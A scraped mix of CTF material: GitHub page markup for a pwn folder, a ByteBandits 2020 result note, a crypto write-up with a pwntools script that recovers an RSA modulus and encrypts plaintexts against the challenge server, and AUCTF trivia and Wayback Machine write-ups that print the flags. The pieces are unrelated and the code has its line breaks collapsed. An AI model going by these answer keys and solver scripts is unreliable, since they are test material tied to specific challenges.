0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>2</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>1</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/KEERRO/ctf-writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":162845937,"originating_url":"https://github.com/KEERRO/ctf-writeups/tree/master/Hack%20Zone%20Tunisia%202020/pwn/pwn3","user_id":null}}" data-hydro-click-hmac="a078a2a693427d5f3d80f70871c849712762c6097bfab4effda87946aa45b4d9"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
<div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" tabindex="" class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" prefetch-on-mouseover >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div></template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<footer class="SelectMenu-footer">View all branches</footer> </ref-selector>
</div>
<div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" tabindex="" hidden class="d-flex flex-column flex-auto overflow-auto"> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/KEERRO/ctf-writeups/refs" cache-key="v0:1647876588.2277062" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="S0VFUlJPL2N0Zi13cml0ZXVwcw==" >
<template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template>
<template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template>
<template data-target="ref-selector.itemTemplate"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> <span>{{ refName }}</span> <span>default</span> </template>
<div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" data-turbo-frame="repo-content-turbo-frame"> <div class="SelectMenu-loading pt-3 pb-0 overflow-hidden" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> </div> </div> <footer class="SelectMenu-footer">View all tags</footer> </ref-selector> </div> </tab-container> </input-demux> </div></div>
</details>
</div>
<div class="Overlay--hidden Overlay-backdrop--center" data-modal-dialog-overlay> <modal-dialog role="dialog" id="warn-tag-match-create-branch-dialog" aria-modal="true" aria-labelledby="warn-tag-match-create-branch-dialog-header" data-view-component="true" class="Overlay Overlay--width-large Overlay--height-auto Overlay--motion-scaleFade"> <header class="Overlay-header Overlay-header--large Overlay-header--divided"> <div class="Overlay-headerContentWrap"> <div class="Overlay-titleWrap"> <h1 id="warn-tag-match-create-branch-dialog-header" class="Overlay-title">Name already in use</h1> </div> <div class="Overlay-actionWrap"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" aria-label="Close" type="button" data-view-component="true" class="close-button Overlay-closeButton"><svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </div> </div> </header> <div class="Overlay-body "> <div data-view-component="true"> A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?</div>
</div> <footer class="Overlay-footer Overlay-footer--alignEnd"> <button data-close-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn"> Cancel</button> <button data-submit-dialog-id="warn-tag-match-create-branch-dialog" type="button" data-view-component="true" class="btn-danger btn"> Create</button> </footer></modal-dialog></div>
<div class="flex-1 mx-2 flex-self-center f4"> <div class="d-none d-sm-block"> <span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Hack Zone Tunisia 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwn3<span>/</span> </div> </div>
<div class="d-flex"> Go to file </div> </div>
<div class="f4 mt-3 mb-3 d-sm-none"><span><span><span>ctf-writeups</span></span></span><span>/</span><span><span>Hack Zone Tunisia 2020</span></span><span>/</span><span><span>pwn</span></span><span>/</span>pwn3<span>/</span></div>
<div class="Box mb-3" > <div class="Box-header position-relative"> <h2 class="sr-only">Latest commit</h2> <div class="js-details-container Details d-flex rounded-top-2 flex-items-center flex-wrap" data-issue-and-pr-hovercards-enabled> <include-fragment src="/KEERRO/ctf-writeups/tree-commit/06bbaff46db8a3bdd138b18de938f9440e4e83b8/Hack%20Zone%20Tunisia%202020/pwn/pwn3" class="d-flex flex-auto flex-items-center" aria-busy="true" aria-label="Loading latest commit"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-3"> </div></include-fragment> <div class="flex-shrink-0"> <h2 class="sr-only">Git stats</h2> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-history"> <path d="m.427 1.927 1.215 1.215a8.002 8.002 0 1 1-1.6 5.685.75.75 0 1 1 1.493-.154 6.5 6.5 0 1 0 1.18-4.458l1.358 1.358A.25.25 0 0 1 3.896 6H.25A.25.25 0 0 1 0 5.75V2.104a.25.25 0 0 1 .427-.177ZM7.75 4a.75.75 0 0 1 .75.75v2.992l2.028.812a.75.75 0 0 1-.557 1.392l-2.5-1A.751.751 0 0 1 7 8.25v-3.5A.75.75 0 0 1 7.75 4Z"></path></svg> <span> History </span> </div> </div> </div> <h2 id="files" class="sr-only">Files</h2>
<include-fragment src="/KEERRO/ctf-writeups/file-list/master/Hack%20Zone%20Tunisia%202020/pwn/pwn3"> Permalink
<div data-view-component="true" class="include-fragment-error flash flash-error flash-full py-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> Failed to load latest commit information.
</div> <div class="js-details-container Details" data-hpc> <div role="grid" aria-labelledby="files" class="Details-content--hidden-not-important js-navigation-container js-active-navigation-container d-block"> <div class="sr-only" role="row"> <div role="columnheader">Type</div> <div role="columnheader">Name</div> <div role="columnheader" class="d-none d-md-block">Latest commit message</div> <div role="columnheader">Commit time</div> </div> <div role="row" class="Box-row Box-row--focus-gray p-0 d-flex js-navigation-item" > <div role="rowheader" class="flex-auto min-width-0 col-md-2"> <span>. .</span> </div> <div role="gridcell" class="d-none d-md-block"></div> <div role="gridcell"></div> </div>
<div role="row" class="Box-row Box-row--focus-gray py-2 d-flex position-relative js-navigation-item "> <div role="gridcell" class="mr-3 flex-shrink-0" style="width: 16px;"> <svg aria-label="File" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-file color-fg-muted"> <path d="M2 1.75C2 .784 2.784 0 3.75 0h6.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v9.586A1.75 1.75 0 0 1 13.25 16h-9.5A1.75 1.75 0 0 1 2 14.25Zm1.75-.25a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h9.5a.25.25 0 0 0 .25-.25V6h-2.75A1.75 1.75 0 0 1 9 4.25V1.5Zm6.75.062V4.25c0 .138.112.25.25.25h2.688l-.011-.013-2.914-2.914-.013-.011Z"></path></svg> </div>
<div role="rowheader" class="flex-auto min-width-0 col-md-2 mr-3"> <span>sploit.py</span> </div>
<div role="gridcell" class="flex-auto min-width-0 d-none d-md-block col-5 mr-3" > <div class="Skeleton Skeleton--text col-7"> </div> </div>
<div role="gridcell" class="color-fg-muted text-right" style="width:100px;"> <div class="Skeleton Skeleton--text"> </div> </div>
</div> </div> </div>
</include-fragment>
</div>
</div>
</div>
</div>
</turbo-frame>
</main> </div>
</div>
<footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2>
<div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div>
<nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div>
<div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template>
</div>
<div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
|
# ByteBandits CTF 2020
## Result86/318 teams (server has been down)
I solved the following challenge.
* write (pwn) ??solves ??pt * [writeup](https://github.com/kam1tsur3/2020_CTF/tree/master/bytebandits/pwn/write/README.md)* autobot (rev) ??solves ??pt * [writeup](https://github.com/kam1tsur3/2020_CTF/tree/master/bytebandits/rev/autobot/README.md)
I participated this contest as a member of KUDoS.
twitter:@kam1tsur3 |
We can simplify `pow(p, m, m)*pow(q, m, m) + p*pow(q, m, m) + q*pow(p, m, m) + p*q + pow(p, m-1, m)*pow(q, m-1, m)` as `pow(x, m, m) == x`, and `pow(y, m-1, m) == 1` for all m, so the simplified version is `p*q+p*q+p*q+p*q+1` or just `p*q*4+1`.
This means we know the public key N and e, and can encrypt any plaintext. Luckily doing this 0x20 times is all that's required to get the flag here. To do it correctly with padding, we have to use the PKCS1_OAEP padding scheme.
```pythonfrom Crypto.Cipher import PKCS1_OAEPfrom Crypto.PublicKey import RSAfrom base64 import b64decode, b64encodefrom pwn import remote
r = remote("crypto.byteband.it", 7002)r.recvline(); r.recvline(); # receive header
for i in range(32): # 32 iterations needed, found by testing print(i, end=" ") d = r.recvuntil("Ciphertext (b64encoded) : ").split(b"\n") plain = b64decode(d[2].split(b" ")[1]) # plaintext is b64encoded in line2 N = int(d[4], 16) # N is in line 4 as hex m = int(d[5], 16) # (not needed) m is in line 5 as hex # revert 4*p*q+1 N = (N-1)//4 e = 65537 # given by gen_rsa_key(bits, e=65537)
# just do regular forward encryption keys = RSA.RsaKey(n=N, e=65537) encryptor = PKCS1_OAEP.new(keys) cipher = encryptor.encrypt(plain) r.send(b64encode(cipher)+b"\n")
# after 32 iterations, print all lineswhile(True): print(r.recvline())``` |
# AUCTF 2020 – OSINT 1
* **Category:** trivia* **Points:** 50
## Challenge
> What President is responsible for the agency that OSINT originated from? (First and Last name)> > NOTE: The flag is NOT in the standard auctf{} format> > Author: FireKing
## Solution
According to [https://en.wikipedia.org/wiki/Open-source_intelligence#History](https://en.wikipedia.org/wiki/Open-source_intelligence#History) and [https://en.wikipedia.org/wiki/Foreign_Broadcast_Information_Service#History](https://en.wikipedia.org/wiki/Foreign_Broadcast_Information_Service#History), the flag is the following.
```Franklin Roosevelt``` |
# Good Old Days
877 points
### Prompt
> This site used to look a lot cooler.
> Author: c
### Solution
Wayback Machine, here I come! This is the most useful view of the captures for the site `ctf.auburn.edu`: https://web.archive.org/web/sitemap/https://ctf.auburn.edu/. It shows that, among other subdirectories (and trust me, I visited each a couple times), the `/users` and `/users/50` pages have both been captured.
https://web.archive.org/web/20200213064621/https://ctf.auburn.edu/users has a user called `auctf{Th053_w3rE_Th3_guD_0l3_d4y5}` - why it has to be at the end of that page, I don't know (I checked the top half a couple times during my research).
```auctf{Th053_w3rE_Th3_guD_0l3_d4y5}```
~Lyell Read |
# Sign me up
## Description
